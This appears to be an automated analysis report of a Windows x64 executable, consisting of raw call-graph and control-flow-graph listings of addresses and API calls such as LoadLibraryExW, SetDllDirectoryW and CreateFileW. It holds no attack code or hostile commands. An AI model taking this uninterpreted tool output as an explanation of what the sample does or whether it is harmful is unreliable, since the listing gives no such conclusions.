7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55968->55978 55970->55944 55971->55944 55973->55955 55974->55957 55975->55962 55976->55960 55977->55968 55978->55966 55979 7ff7102cbf5c 56000 7ff7102cc12c 55979->56000 55982 7ff7102cc0a8 56119 7ff7102cc44c 7 API calls 2 library calls 55982->56119 55983 7ff7102cbf78 __scrt_acquire_startup_lock 55985 7ff7102cc0b2 55983->55985 55989 7ff7102cbf96 __scrt_release_startup_lock 55983->55989 56120 7ff7102cc44c 7 API calls 2 library calls 55985->56120 55987 7ff7102cbfbb 55988 7ff7102cc0bd __CxxCallCatchBlock 55989->55987 55990 7ff7102cc041 55989->55990 56116 7ff7102d8e44 45 API calls 55989->56116 56006 7ff7102cc594 55990->56006 55992 7ff7102cc046 56009 7ff7102c1000 55992->56009 55997 7ff7102cc069 55997->55988 56118 7ff7102cc2b0 7 API calls 55997->56118 55999 7ff7102cc080 55999->55987 56001 7ff7102cc134 56000->56001 56002 7ff7102cc140 __scrt_dllmain_crt_thread_attach 56001->56002 56003 7ff7102cbf70 56002->56003 56004 7ff7102cc14d 56002->56004 56003->55982 56003->55983 56004->56003 56121 7ff7102ccba8 7 API calls 2 library calls 56004->56121 56122 7ff7102e97e0 56006->56122 56010 7ff7102c1009 56009->56010 56124 7ff7102d4794 56010->56124 56012 7ff7102c352b 56131 7ff7102c33e0 56012->56131 56015 7ff7102c3538 56017 7ff7102cb870 _log10_special 8 API calls 56015->56017 56019 7ff7102c372a 56017->56019 56117 7ff7102cc5d8 GetModuleHandleW 56019->56117 56020 7ff7102c3736 56022 7ff7102c3f70 108 API calls 56020->56022 56021 7ff7102c356c 56023 7ff7102c1bf0 49 API calls 56021->56023 56024 7ff7102c3746 56022->56024 56036 7ff7102c3588 56023->56036 56025 7ff7102c3785 56024->56025 56221 7ff7102c76a0 56024->56221 56230 7ff7102c25f0 53 API calls _log10_special 56025->56230 56029 7ff7102c3778 56031 7ff7102c379f 56029->56031 56032 7ff7102c377d 56029->56032 56030 7ff7102c365f __std_exception_copy 56033 7ff7102c3844 56030->56033 56037 7ff7102c7e10 14 API calls 56030->56037 56035 7ff7102c1bf0 49 API calls 56031->56035 56034 7ff7102cf36c 74 API calls 56032->56034 56234 7ff7102c3e90 49 API calls 56033->56234 56034->56025 56039 7ff7102c37be 56035->56039 56193 7ff7102c7e10 56036->56193 56040 7ff7102c36ae 56037->56040 56045 7ff7102c18f0 115 API calls 56039->56045 56219 7ff7102c7f80 40 API calls __std_exception_copy 56040->56219 56041 7ff7102c3852 56043 7ff7102c3871 56041->56043 56044 7ff7102c3865 56041->56044 56047 7ff7102c1bf0 49 API calls 56043->56047 56235 7ff7102c3fe0 56044->56235 56048 7ff7102c37df 56045->56048 56064 7ff7102c3805 __std_exception_copy 56047->56064 56048->56036 56051 7ff7102c37ef 56048->56051 56049 7ff7102c380f 56232 7ff7102c8400 58 API calls _log10_special 56049->56232 56050 7ff7102c36bd 56050->56049 56052 7ff7102c36cf 56050->56052 56231 7ff7102c25f0 53 API calls _log10_special 56051->56231 56056 7ff7102c1bf0 49 API calls 56052->56056 56054 7ff7102c86b0 2 API calls 56058 7ff7102c389e SetDllDirectoryW 56054->56058 56059 7ff7102c36f1 56056->56059 56057 7ff7102c3814 56233 7ff7102c7c40 84 API calls 2 library calls 56057->56233 56063 7ff7102c38c3 56058->56063 56059->56064 56065 7ff7102c36fc 56059->56065 56067 7ff7102c3a50 56063->56067 56238 7ff7102c6560 53 API calls 56063->56238 56064->56054 56220 7ff7102c25f0 53 API calls _log10_special 56065->56220 56066 7ff7102c3834 56066->56033 56066->56064 56071 7ff7102c3a5a PostMessageW GetMessageW 56067->56071 56072 7ff7102c3a7d 56067->56072 56070 7ff7102c38d5 56239 7ff7102c6b00 118 API calls 2 library calls 56070->56239 56071->56072 56206 7ff7102c3080 56072->56206 56074 7ff7102c38ea 56076 7ff7102c3947 56074->56076 56078 7ff7102c3901 56074->56078 56240 7ff7102c65a0 121 API calls _log10_special 56074->56240 56076->56067 56083 7ff7102c395c 56076->56083 56090 7ff7102c3905 56078->56090 56241 7ff7102c6970 91 API calls 56078->56241 56245 7ff7102c30e0 122 API calls 2 library calls 56083->56245 56084 7ff7102c3916 56084->56090 56242 7ff7102c6cd0 54 API calls 56084->56242 56088 7ff7102c3aa3 56089 7ff7102c3964 56089->56015 56092 7ff7102c396c 56089->56092 56090->56076 56243 7ff7102c2870 53 API calls _log10_special 56090->56243 56246 7ff7102c83e0 LocalFree 56092->56246 56094 7ff7102c393f 56244 7ff7102c6780 FreeLibrary 56094->56244 56116->55990 56117->55997 56118->55999 56119->55985 56120->55988 56121->56003 56123 7ff7102cc5ab GetStartupInfoW 56122->56123 56123->55992 56127 7ff7102de790 56124->56127 56125 7ff7102de7e3 56248 7ff7102d9b24 37 API calls 2 library calls 56125->56248 56127->56125 56128 7ff7102de836 56127->56128 56249 7ff7102de668 71 API calls _fread_nolock 56128->56249 56130 7ff7102de80c 56130->56012 56250 7ff7102cbb70 56131->56250 56134 7ff7102c3438 56252 7ff7102c85a0 FindFirstFileExW 56134->56252 56135 7ff7102c341b 56257 7ff7102c29e0 51 API calls _log10_special 56135->56257 56139 7ff7102c342e 56143 7ff7102cb870 _log10_special 8 API calls 56139->56143 56140 7ff7102c34a5 56260 7ff7102c8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 56140->56260 56141 7ff7102c344b 56258 7ff7102c8620 CreateFileW GetFinalPathNameByHandleW CloseHandle 56141->56258 56146 7ff7102c34dd 56143->56146 56145 7ff7102c3458 56148 7ff7102c345c 56145->56148 56152 7ff7102c3474 __vcrt_FlsAlloc 56145->56152 56146->56015 56153 7ff7102c18f0 56146->56153 56147 7ff7102c34b3 56147->56139 56261 7ff7102c26c0 49 API calls _log10_special 56147->56261 56259 7ff7102c26c0 49 API calls _log10_special 56148->56259 56151 7ff7102c346d 56151->56139 56152->56140 56154 7ff7102c3f70 108 API calls 56153->56154 56155 7ff7102c1925 56154->56155 56156 7ff7102c1bb6 56155->56156 56158 7ff7102c76a0 83 API calls 56155->56158 56157 7ff7102cb870 _log10_special 8 API calls 56156->56157 56159 7ff7102c1bd1 56157->56159 56160 7ff7102c196b 56158->56160 56159->56020 56159->56021 56161 7ff7102cf9f4 73 API calls 56160->56161 56192 7ff7102c199c 56160->56192 56163 7ff7102c1985 56161->56163 56162 7ff7102cf36c 74 API calls 56162->56156 56164 7ff7102c19a1 56163->56164 56165 7ff7102c1989 56163->56165 56167 7ff7102cf6bc _fread_nolock 53 API calls 56164->56167 56262 7ff7102c2760 53 API calls 2 library calls 56165->56262 56168 7ff7102c19b9 56167->56168 56169 7ff7102c19bf 56168->56169 56170 7ff7102c19d7 56168->56170 56263 7ff7102c2760 53 API calls 2 library calls 56169->56263 56172 7ff7102c1a06 56170->56172 56173 7ff7102c19ee 56170->56173 56175 7ff7102c1bf0 49 API calls 56172->56175 56264 7ff7102c2760 53 API calls 2 library calls 56173->56264 56176 7ff7102c1a1d 56175->56176 56177 7ff7102c1bf0 49 API calls 56176->56177 56178 7ff7102c1a68 56177->56178 56179 7ff7102cf9f4 73 API calls 56178->56179 56180 7ff7102c1a8c 56179->56180 56181 7ff7102c1aa1 56180->56181 56182 7ff7102c1ab9 56180->56182 56265 7ff7102c2760 53 API calls 2 library calls 56181->56265 56184 7ff7102cf6bc _fread_nolock 53 API calls 56182->56184 56185 7ff7102c1ace 56184->56185 56186 7ff7102c1ad4 56185->56186 56187 7ff7102c1aec 56185->56187 56266 7ff7102c2760 53 API calls 2 library calls 56186->56266 56267 7ff7102cf430 37 API calls 2 library calls 56187->56267 56190 7ff7102c1b06 56190->56192 56268 7ff7102c25f0 53 API calls _log10_special 56190->56268 56192->56162 56194 7ff7102c7e1a 56193->56194 56195 7ff7102c86b0 2 API calls 56194->56195 56196 7ff7102c7e39 GetEnvironmentVariableW 56195->56196 56197 7ff7102c7ea2 56196->56197 56198 7ff7102c7e56 ExpandEnvironmentStringsW 56196->56198 56200 7ff7102cb870 _log10_special 8 API calls 56197->56200 56198->56197 56199 7ff7102c7e78 56198->56199 56269 7ff7102c8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 56199->56269 56202 7ff7102c7eb4 56200->56202 56202->56030 56203 7ff7102c7e8a 56204 7ff7102cb870 _log10_special 8 API calls 56203->56204 56205 7ff7102c7e9a 56204->56205 56205->56030 56270 7ff7102c5af0 56206->56270 56209 7ff7102c30b9 56215 7ff7102c33a0 56209->56215 56211 7ff7102c30a1 56211->56209 56340 7ff7102c5800 56211->56340 56213 7ff7102c30ad 56213->56209 56349 7ff7102c5990 53 API calls 56213->56349 56216 7ff7102c33ae 56215->56216 56217 7ff7102c33bf 56216->56217 56412 7ff7102c8180 FreeLibrary 56216->56412 56247 7ff7102c6780 FreeLibrary 56217->56247 56219->56050 56220->56015 56222 7ff7102c76c4 56221->56222 56223 7ff7102cf9f4 73 API calls 56222->56223 56226 7ff7102c779b __std_exception_copy 56222->56226 56224 7ff7102c76e0 56223->56224 56224->56226 56413 7ff7102d6bd8 56224->56413 56226->56029 56227 7ff7102cf9f4 73 API calls 56229 7ff7102c76f5 56227->56229 56228 7ff7102cf6bc _fread_nolock 53 API calls 56228->56229 56229->56226 56229->56227 56229->56228 56230->56015 56231->56015 56232->56057 56233->56066 56234->56041 56236 7ff7102c1bf0 49 API calls 56235->56236 56237 7ff7102c4010 56236->56237 56237->56064 56237->56237 56238->56070 56239->56074 56240->56078 56241->56084 56242->56090 56243->56094 56244->56076 56245->56089 56247->56088 56248->56130 56249->56130 56251 7ff7102c33ec GetModuleFileNameW 56250->56251 56251->56134 56251->56135 56253 7ff7102c85df FindClose 56252->56253 56254 7ff7102c85f2 56252->56254 56253->56254 56255 7ff7102cb870 _log10_special 8 API calls 56254->56255 56256 7ff7102c3442 56255->56256 56256->56140 56256->56141 56257->56139 56258->56145 56259->56151 56260->56147 56261->56139 56262->56192 56263->56192 56264->56192 56265->56192 56266->56192 56267->56190 56268->56192 56269->56203 56271 7ff7102c5b05 56270->56271 56272 7ff7102c1bf0 49 API calls 56271->56272 56273 7ff7102c5b41 56272->56273 56274 7ff7102c5b4a 56273->56274 56275 7ff7102c5b6d 56273->56275 56360 7ff7102c25f0 53 API calls _log10_special 56274->56360 56277 7ff7102c3fe0 49 API calls 56275->56277 56278 7ff7102c5b85 56277->56278 56280 7ff7102c5ba3 56278->56280 56361 7ff7102c25f0 53 API calls _log10_special 56278->56361 56279 7ff7102c5b63 56283 7ff7102cb870 _log10_special 8 API calls 56279->56283 56350 7ff7102c3f10 56280->56350 56285 7ff7102c308e 56283->56285 56285->56209 56301 7ff7102c5c80 56285->56301 56286 7ff7102c5bbb 56288 7ff7102c3fe0 49 API calls 56286->56288 56289 7ff7102c5bd4 56288->56289 56290 7ff7102c5bf9 56289->56290 56291 7ff7102c5bd9 56289->56291 56293 7ff7102c81a0 3 API calls 56290->56293 56362 7ff7102c25f0 53 API calls _log10_special 56291->56362 56294 7ff7102c5c06 56293->56294 56295 7ff7102c5c12 56294->56295 56296 7ff7102c5c49 56294->56296 56297 7ff7102c86b0 2 API calls 56295->56297 56364 7ff7102c50b0 95 API calls 56296->56364 56299 7ff7102c5c2a 56297->56299 56363 7ff7102c29e0 51 API calls _log10_special 56299->56363 56365 7ff7102c4c80 56301->56365 56303 7ff7102c5cba 56304 7ff7102c5cc2 56303->56304 56305 7ff7102c5cd3 56303->56305 56397 7ff7102c25f0 53 API calls _log10_special 56304->56397 56372 7ff7102c4450 56305->56372 56309 7ff7102c5cf0 56312 7ff7102c5d10 56309->56312 56313 7ff7102c5cff 56309->56313 56310 7ff7102c5cdf 56398 7ff7102c25f0 53 API calls _log10_special 56310->56398 56376 7ff7102c4700 56312->56376 56399 7ff7102c25f0 53 API calls _log10_special 56313->56399 56314 7ff7102c5cce 56314->56211 56317 7ff7102c5d2b 56318 7ff7102c5d40 56317->56318 56319 7ff7102c5d2f 56317->56319 56321 7ff7102c5d60 56318->56321 56322 7ff7102c5d4f 56318->56322 56400 7ff7102c25f0 53 API calls _log10_special 56319->56400 56383 7ff7102c45a0 56321->56383 56401 7ff7102c25f0 53 API calls _log10_special 56322->56401 56326 7ff7102c5d80 56329 7ff7102c5d8f 56326->56329 56331 7ff7102c5da0 56326->56331 56327 7ff7102c5d6f 56402 7ff7102c25f0 53 API calls _log10_special 56327->56402 56403 7ff7102c25f0 53 API calls _log10_special 56329->56403 56332 7ff7102c5db1 56331->56332 56334 7ff7102c5dc2 56331->56334 56404 7ff7102c25f0 53 API calls _log10_special 56332->56404 56337 7ff7102c5dec 56334->56337 56405 7ff7102d65c0 73 API calls 56334->56405 56336 7ff7102c5dda 56406 7ff7102d65c0 73 API calls 56336->56406 56337->56314 56407 7ff7102c25f0 53 API calls _log10_special 56337->56407 56341 7ff7102c5820 56340->56341 56341->56341 56342 7ff7102c5849 56341->56342 56348 7ff7102c5860 __std_exception_copy 56341->56348 56411 7ff7102c25f0 53 API calls _log10_special 56342->56411 56344 7ff7102c5855 56344->56213 56345 7ff7102c596b 56345->56213 56346 7ff7102c1440 116 API calls 56346->56348 56347 7ff7102c25f0 53 API calls 56347->56348 56348->56345 56348->56346 56348->56347 56349->56209 56351 7ff7102c3f1a 56350->56351 56352 7ff7102c86b0 2 API calls 56351->56352 56353 7ff7102c3f3f 56352->56353 56354 7ff7102cb870 _log10_special 8 API calls 56353->56354 56355 7ff7102c3f67 56354->56355 56355->56286 56356 7ff7102c81a0 56355->56356 56357 7ff7102c86b0 2 API calls 56356->56357 56358 7ff7102c81b4 LoadLibraryExW 56357->56358 56359 7ff7102c81d3 __std_exception_copy 56358->56359 56359->56286 56360->56279 56361->56280 56362->56279 56363->56279 56364->56279 56367 7ff7102c4cac 56365->56367 56366 7ff7102c4cb4 56366->56303 56367->56366 56370 7ff7102c4e54 56367->56370 56408 7ff7102d5db4 48 API calls 56367->56408 56368 7ff7102c5017 __std_exception_copy 56368->56303 56369 7ff7102c4180 47 API calls 56369->56370 56370->56368 56370->56369 56373 7ff7102c4480 56372->56373 56374 7ff7102cb870 _log10_special 8 API calls 56373->56374 56375 7ff7102c44ea 56374->56375 56375->56309 56375->56310 56377 7ff7102c476f 56376->56377 56380 7ff7102c471b 56376->56380 56410 7ff7102c4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 56377->56410 56379 7ff7102c477c 56379->56317 56382 7ff7102c475a 56380->56382 56409 7ff7102c4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 56380->56409 56382->56317 56384 7ff7102c45b5 56383->56384 56385 7ff7102c1bf0 49 API calls 56384->56385 56386 7ff7102c4601 56385->56386 56387 7ff7102c1bf0 49 API calls 56386->56387 56396 7ff7102c4687 __std_exception_copy 56386->56396 56389 7ff7102c4640 56387->56389 56388 7ff7102cb870 _log10_special 8 API calls 56390 7ff7102c46dc 56388->56390 56391 7ff7102c86b0 2 API calls 56389->56391 56389->56396 56390->56326 56390->56327 56392 7ff7102c465a 56391->56392 56393 7ff7102c86b0 2 API calls 56392->56393 56394 7ff7102c4671 56393->56394 56395 7ff7102c86b0 2 API calls 56394->56395 56395->56396 56396->56388 56397->56314 56398->56314 56399->56314 56400->56314 56401->56314 56402->56314 56403->56314 56404->56314 56405->56336 56406->56337 56407->56314 56408->56367 56409->56382 56410->56379 56411->56344 56412->56217 56414 7ff7102d6c08 56413->56414 56417 7ff7102d66e4 56414->56417 56416 7ff7102d6c21 56416->56229 56418 7ff7102d66ff 56417->56418 56419 7ff7102d672e 56417->56419 56428 7ff7102d9b24 37 API calls 2 library calls 56418->56428 56427 7ff7102d477c EnterCriticalSection 56419->56427 56422 7ff7102d671f 56422->56416 56423 7ff7102d6733 56424 7ff7102d6750 38 API calls 56423->56424 56425 7ff7102d673f 56424->56425 56426 7ff7102d4788 _fread_nolock LeaveCriticalSection 56425->56426 56426->56422 56428->56422 56429 7ff7102d4938 56430 7ff7102d496f 56429->56430 56431 7ff7102d4952 56429->56431 56430->56431 56433 7ff7102d4982 CreateFileW 56430->56433 56480 7ff7102d43d4 11 API calls _get_daylight 56431->56480 56435 7ff7102d49b6 56433->56435 56436 7ff7102d49ec 56433->56436 56434 7ff7102d4957 56481 7ff7102d43f4 11 API calls _get_daylight 56434->56481 56454 7ff7102d4a8c GetFileType 56435->56454 56483 7ff7102d4f14 46 API calls 3 library calls 56436->56483 56441 7ff7102d49f1 56445 7ff7102d49f5 56441->56445 56446 7ff7102d4a20 56441->56446 56442 7ff7102d495f 56482 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 56442->56482 56443 7ff7102d49e1 CloseHandle 56450 7ff7102d496a 56443->56450 56444 7ff7102d49cb CloseHandle 56444->56450 56484 7ff7102d4368 11 API calls 2 library calls 56445->56484 56485 7ff7102d4cd4 56446->56485 56453 7ff7102d49ff 56453->56450 56455 7ff7102d4b97 56454->56455 56456 7ff7102d4ada 56454->56456 56458 7ff7102d4b9f 56455->56458 56459 7ff7102d4bc1 56455->56459 56457 7ff7102d4b06 GetFileInformationByHandle 56456->56457 56503 7ff7102d4e10 21 API calls _fread_nolock 56456->56503 56461 7ff7102d4b2f 56457->56461 56462 7ff7102d4bb2 GetLastError 56457->56462 56458->56462 56463 7ff7102d4ba3 56458->56463 56464 7ff7102d4be4 PeekNamedPipe 56459->56464 56479 7ff7102d4b82 56459->56479 56466 7ff7102d4cd4 51 API calls 56461->56466 56506 7ff7102d4368 11 API calls 2 library calls 56462->56506 56505 7ff7102d43f4 11 API calls _get_daylight 56463->56505 56464->56479 56465 7ff7102d4af4 56465->56457 56465->56479 56470 7ff7102d4b3a 56466->56470 56469 7ff7102cb870 _log10_special 8 API calls 56471 7ff7102d49c4 56469->56471 56496 7ff7102d4c34 56470->56496 56471->56443 56471->56444 56474 7ff7102d4c34 10 API calls 56475 7ff7102d4b59 56474->56475 56476 7ff7102d4c34 10 API calls 56475->56476 56477 7ff7102d4b6a 56476->56477 56477->56479 56504 7ff7102d43f4 11 API calls _get_daylight 56477->56504 56479->56469 56480->56434 56481->56442 56482->56450 56483->56441 56484->56453 56487 7ff7102d4cfc 56485->56487 56486 7ff7102d4a2d 56495 7ff7102d4e10 21 API calls _fread_nolock 56486->56495 56487->56486 56507 7ff7102dea34 51 API calls 2 library calls 56487->56507 56489 7ff7102d4d90 56489->56486 56508 7ff7102dea34 51 API calls 2 library calls 56489->56508 56491 7ff7102d4da3 56491->56486 56509 7ff7102dea34 51 API calls 2 library calls 56491->56509 56493 7ff7102d4db6 56493->56486 56510 7ff7102dea34 51 API calls 2 library calls 56493->56510 56495->56453 56497 7ff7102d4c50 56496->56497 56498 7ff7102d4c5d FileTimeToSystemTime 56496->56498 56497->56498 56500 7ff7102d4c58 56497->56500 56499 7ff7102d4c71 SystemTimeToTzSpecificLocalTime 56498->56499 56498->56500 56499->56500 56501 7ff7102cb870 _log10_special 8 API calls 56500->56501 56502 7ff7102d4b49 56501->56502 56502->56474 56503->56465 56504->56479 56505->56479 56506->56479 56507->56489 56508->56491 56509->56493 56510->56486 56511 7ffeee1d6110 56512 7ffeee1d6138 56511->56512 56513 7ffeee1d6124 56511->56513 56564 7ffeee20a4a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 56512->56564 56515 7ffeee1d6161 56513->56515 56524 7ffeee1d626c 56513->56524 56517 7ffeee1d616a 56515->56517 56518 7ffeee1d6211 56515->56518 56516 7ffeee1d61d5 56520 7ffeee1d61e9 56517->56520 56521 7ffeee1d616f GetLastError 56517->56521 56557 7ffeee1d76f0 56518->56557 56520->56516 56528 7ffeee1d61f9 56520->56528 56522 7ffeee1d618b 56521->56522 56523 7ffeee1d6186 56521->56523 56531 7ffeee1d6197 56522->56531 56568 7ffeee1d62cc 6 API calls wmemcpy_s 56522->56568 56565 7ffeee1d3a40 6 API calls wmemcpy_s 56523->56565 56524->56516 56585 7ffeee1d77ec 117 API calls 56524->56585 56567 7ffeee1d3a40 6 API calls wmemcpy_s 56528->56567 56529 7ffeee1d6223 56532 7ffeee1d62b7 SetLastError 56529->56532 56569 7ffeee1cdcf0 56529->56569 56531->56532 56534 7ffeee1d61a1 56531->56534 56532->56516 56533 7ffeee1d61fe 56533->56516 56588 7ffeee1d62cc 6 API calls wmemcpy_s 56533->56588 56534->56532 56537 7ffeee1d61aa 56534->56537 56566 7ffeee1d3a40 6 API calls wmemcpy_s 56537->56566 56539 7ffeee2133ef 56589 7ffeee1df930 29 API calls __free_lconv_num 56539->56589 56541 7ffeee1d6248 56582 7ffeee1d62cc 6 API calls wmemcpy_s 56541->56582 56542 7ffeee1d62a9 56586 7ffeee1d62cc 6 API calls wmemcpy_s 56542->56586 56544 7ffeee1d61b5 SetLastError 56544->56516 56547 7ffeee1d61d0 56544->56547 56547->56516 56548 7ffeee1d62b0 56587 7ffeee1cf040 25 API calls 2 library calls 56548->56587 56549 7ffeee1d6250 56550 7ffeee1d6258 56549->56550 56551 7ffeee213408 56549->56551 56583 7ffeee1d63a4 25 API calls wmemcpy_s 56550->56583 56590 7ffeee1d62cc 6 API calls wmemcpy_s 56551->56590 56555 7ffeee1d6260 56584 7ffeee1cf040 25 API calls 2 library calls 56555->56584 56591 7ffeee20967c 56557->56591 56560 7ffeee1d773d 56562 7ffeee1d7746 56560->56562 56607 7ffeee2096bc 8 API calls 3 library calls 56560->56607 56561 7ffeee1d7704 56561->56560 56599 7ffeee1dc7f0 EnterCriticalSection 56561->56599 56562->56516 56564->56513 56565->56522 56566->56544 56567->56533 56568->56529 56570 7ffeee1cdd16 HeapAlloc 56569->56570 56571 7ffeee1cdd01 56569->56571 56573 7ffeee210f80 56570->56573 56574 7ffeee1cdd47 56570->56574 56571->56570 56572 7ffeee210f6e 56571->56572 56661 7ffeee1d3440 25 API calls 2 library calls 56572->56661 56580 7ffeee210f9f HeapAlloc 56573->56580 56581 7ffeee210fb9 56573->56581 56662 7ffeee1c3964 8 API calls wmemcpy_s 56573->56662 56663 7ffeee22c860 10 API calls wmemcpy_s 56573->56663 56574->56541 56574->56542 56579 7ffeee210fc3 56580->56573 56580->56581 56664 7ffeee1d3440 25 API calls 2 library calls 56581->56664 56582->56549 56583->56555 56584->56531 56585->56516 56586->56548 56587->56532 56588->56539 56589->56547 56590->56548 56592 7ffeee209685 __vcrt_initialize_winapi_thunks 56591->56592 56608 7ffeee209c98 56592->56608 56595 7ffeee209698 56595->56561 56597 7ffeee2096a1 56597->56595 56615 7ffeee209d04 DeleteCriticalSection 56597->56615 56632 7ffeee1dc998 56599->56632 56601 7ffeee1dc81c LeaveCriticalSection 56601->56561 56602 7ffeee1dc80c 56602->56601 56643 7ffeee1dc93c 79 API calls 56602->56643 56604 7ffeee1dc815 56644 7ffeee1dc838 GetStdHandle GetFileType 56604->56644 56606 7ffeee1dc81a 56606->56601 56607->56560 56609 7ffeee209ca0 56608->56609 56611 7ffeee209cd1 56609->56611 56612 7ffeee209694 56609->56612 56616 7ffeee20a0a0 56609->56616 56621 7ffeee209d04 DeleteCriticalSection 56611->56621 56612->56595 56614 7ffeee209854 8 API calls 2 library calls 56612->56614 56614->56597 56615->56595 56622 7ffeee209d88 56616->56622 56619 7ffeee20a0e0 56619->56609 56620 7ffeee20a0eb InitializeCriticalSectionAndSpinCount 56620->56619 56621->56612 56623 7ffeee209de9 56622->56623 56624 7ffeee209de4 try_get_function 56622->56624 56623->56619 56623->56620 56624->56623 56625 7ffeee209e18 LoadLibraryExW 56624->56625 56629 7ffeee209eb1 FreeLibrary 56624->56629 56630 7ffeee209ecc 56624->56630 56631 7ffeee209e73 LoadLibraryExW 56624->56631 56625->56624 56626 7ffeee209e39 GetLastError 56625->56626 56626->56624 56627 7ffeee209eda GetProcAddress 56628 7ffeee209eeb 56627->56628 56628->56623 56629->56624 56630->56623 56630->56627 56631->56624 56633 7ffeee1dc9bb EnterCriticalSection 56632->56633 56634 7ffeee215b28 56632->56634 56636 7ffeee1dc9d3 56633->56636 56657 7ffeee1d3440 25 API calls 2 library calls 56634->56657 56638 7ffeee1dca12 LeaveCriticalSection 56636->56638 56642 7ffeee1dca0d 56636->56642 56645 7ffeee1dca40 56636->56645 56637 7ffeee215b2d 56658 7ffeee1e2370 73 API calls wmemcpy_s 56637->56658 56638->56602 56640 7ffeee215b39 56642->56638 56643->56604 56644->56606 56646 7ffeee1cdcf0 wmemcpy_s 25 API calls 56645->56646 56647 7ffeee1dca54 56646->56647 56648 7ffeee1dcb24 56647->56648 56650 7ffeee215b83 InitializeCriticalSectionAndSpinCount 56647->56650 56655 7ffeee215b40 56647->56655 56659 7ffeee1cf040 25 API calls 2 library calls 56648->56659 56652 7ffeee215b98 GetProcAddress 56650->56652 56651 7ffeee1dcb42 56651->56636 56654 7ffeee215b5c 56652->56654 56654->56650 56656 7ffeee215bdb 56654->56656 56655->56652 56655->56654 56660 7ffeee1dbfe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_function 56655->56660 56656->56656 56657->56637 56658->56640 56659->56651 56660->56655 56661->56574 56662->56573 56663->56573 56664->56579 56665 7ff7102d8c79 56677 7ff7102d96e8 56665->56677 56667 7ff7102d8c7e 56668 7ff7102d8ca5 GetModuleHandleW 56667->56668 56669 7ff7102d8cef 56667->56669 56668->56669 56675 7ff7102d8cb2 56668->56675 56670 7ff7102d8b7c 11 API calls 56669->56670 56671 7ff7102d8d2b 56670->56671 56672 7ff7102d8d32 56671->56672 56673 7ff7102d8d48 11 API calls 56671->56673 56674 7ff7102d8d44 56673->56674 56675->56669 56676 7ff7102d8da0 GetModuleHandleExW GetProcAddress FreeLibrary 56675->56676 56676->56669 56682 7ff7102da460 45 API calls 3 library calls 56677->56682 56680 7ff7102d96f1 56683 7ff7102d9814 45 API calls __CxxCallCatchBlock 56680->56683 56682->56680

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 7ff7102c1000-7ff7102c3536 call 7ff7102cf138 call 7ff7102cf140 call 7ff7102cbb70 call 7ff7102d4700 call 7ff7102d4794 call 7ff7102c33e0 14 7ff7102c3544-7ff7102c3566 call 7ff7102c18f0 0->14 15 7ff7102c3538-7ff7102c353f 0->15 21 7ff7102c3736-7ff7102c374c call 7ff7102c3f70 14->21 22 7ff7102c356c-7ff7102c3583 call 7ff7102c1bf0 14->22 16 7ff7102c371a-7ff7102c3735 call 7ff7102cb870 15->16 27 7ff7102c3785-7ff7102c379a call 7ff7102c25f0 21->27 28 7ff7102c374e-7ff7102c377b call 7ff7102c76a0 21->28 26 7ff7102c3588-7ff7102c35c1 22->26 29 7ff7102c3653-7ff7102c366d call 7ff7102c7e10 26->29 30 7ff7102c35c7-7ff7102c35cb 26->30 44 7ff7102c3712 27->44 41 7ff7102c379f-7ff7102c37be call 7ff7102c1bf0 28->41 42 7ff7102c377d-7ff7102c3780 call 7ff7102cf36c 28->42 45 7ff7102c366f-7ff7102c3675 29->45 46 7ff7102c3695-7ff7102c369c 29->46 34 7ff7102c3638-7ff7102c364d call 7ff7102c18e0 30->34 35 7ff7102c35cd-7ff7102c35e5 call 7ff7102d4560 30->35 34->29 34->30 54 7ff7102c35f2-7ff7102c360a call 7ff7102d4560 35->54 55 7ff7102c35e7-7ff7102c35eb 35->55 61 7ff7102c37c1-7ff7102c37ca 41->61 42->27 44->16 52 7ff7102c3682-7ff7102c3690 call 7ff7102d415c 45->52 53 7ff7102c3677-7ff7102c3680 45->53 48 7ff7102c36a2-7ff7102c36c0 call 7ff7102c7e10 call 7ff7102c7f80 46->48 49 7ff7102c3844-7ff7102c3863 call 7ff7102c3e90 46->49 78 7ff7102c380f-7ff7102c381e call 7ff7102c8400 48->78 79 7ff7102c36c6-7ff7102c36c9 48->79 69 7ff7102c3871-7ff7102c3882 call 7ff7102c1bf0 49->69 70 7ff7102c3865-7ff7102c386f call 7ff7102c3fe0 49->70 52->46 53->52 66 7ff7102c3617-7ff7102c362f call 7ff7102d4560 54->66 67 7ff7102c360c-7ff7102c3610 54->67 55->54 61->61 65 7ff7102c37cc-7ff7102c37e9 call 7ff7102c18f0 61->65 65->26 82 7ff7102c37ef-7ff7102c3800 call 7ff7102c25f0 65->82 66->34 83 7ff7102c3631 66->83 67->66 81 7ff7102c3887-7ff7102c38a1 call 7ff7102c86b0 69->81 70->81 93 7ff7102c3820 78->93 94 7ff7102c382c-7ff7102c3836 call 7ff7102c7c40 78->94 79->78 84 7ff7102c36cf-7ff7102c36f6 call 7ff7102c1bf0 79->84 95 7ff7102c38af-7ff7102c38c1 SetDllDirectoryW 81->95 96 7ff7102c38a3 81->96 82->44 83->34 100 7ff7102c3805-7ff7102c380d call 7ff7102d415c 84->100 101 7ff7102c36fc-7ff7102c3703 call 7ff7102c25f0 84->101 93->94 94->81 107 7ff7102c3838 94->107 98 7ff7102c38d0-7ff7102c38ec call 7ff7102c6560 call 7ff7102c6b00 95->98 99 7ff7102c38c3-7ff7102c38ca 95->99 96->95 118 7ff7102c3947-7ff7102c394a call 7ff7102c6510 98->118 119 7ff7102c38ee-7ff7102c38f4 98->119 99->98 103 7ff7102c3a50-7ff7102c3a58 99->103 100->81 110 7ff7102c3708-7ff7102c370a 101->110 111 7ff7102c3a5a-7ff7102c3a77 PostMessageW GetMessageW 103->111 112 7ff7102c3a7d-7ff7102c3a92 call 7ff7102c33d0 call 7ff7102c3080 call 7ff7102c33a0 103->112 107->49 110->44 111->112 128 7ff7102c3a97-7ff7102c3aaf call 7ff7102c6780 call 7ff7102c6510 112->128 126 7ff7102c394f-7ff7102c3956 118->126 121 7ff7102c38f6-7ff7102c3903 call 7ff7102c65a0 